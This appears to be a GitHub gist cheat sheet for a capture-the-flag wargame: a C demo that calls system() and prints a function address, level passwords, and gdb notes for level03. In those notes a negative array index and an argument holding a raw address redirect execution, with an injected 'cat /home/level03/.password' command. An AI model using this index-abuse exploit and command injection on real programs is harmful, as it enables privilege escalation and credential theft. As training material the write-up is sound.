
@bmcculley
Created September 26, 2018 03:34
Cheat sheet
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
/*
 * Run the `whoami` command through system(), i.e. via the host's command
 * processor, and discard the command's exit status.
 *
 * NOTE(review): system() passes the string to a shell and `whoami` is
 * resolved through the caller's environment (PATH), so this form is only
 * suitable for a throwaway demo, not for code that runs with privileges.
 */
void run() {
    const char *command = "whoami";

    (void)system(command);
}
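/*
 * Print the address of run() so it can be compared with what a debugger
 * reports for the same symbol.
 *
 * argc and argv are accepted but not used. Always returns 0.
 */
int main(int argc, char const *argv[])
{
    /* Part of the signature, unused by this demo. */
    (void)argc;
    (void)argv;

    /*
     * %p expects a void *; passing a function pointer uncast is undefined
     * behaviour for printf. Converting a function pointer to void * is a
     * widely supported extension rather than strictly portable ISO C.
     */
    printf("Address: %p\n", (void *)run);

    /*
     * The commented-out snippet below calls run() through a raw address
     * instead of by name:
     *   - compile, then use gdb to read the address of run:
     *       gdb ./a.out
     *       (gdb) print run
     *   - put that address in place of "<address>", recompile and run.
     *
     * NOTE(review): a hard-coded address is tied to one specific build; it
     * can change after recompiling, and for position-independent executables
     * it can differ between runs. Also, run() returns void while the pointer
     * type below returns int, so the types do not match. Confirm before
     * enabling.
     */
    /*
    int (*func)(void) = (int (*)(void))<address>;
    func();
    */
    return 0;
}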
level00
pass: izeecahd
level01
pass: aepeefoo
level02
pass: quemaosh
level03
run address:
0x804879b
run 0 abcd
x/64xb buf
print fns
print &buf
print (fns - buf) / 4
27
run -27 "`echo -e "\x9b\x87\x04\x08"`"
run -27 "`echo -e "cat /home/level03/.password;#\x9b\x87\x04\x08"`"
run -20 "`echo -e "cat /home/level03/.password;\x9b\x87\x04\x08"`"
pass: eingaima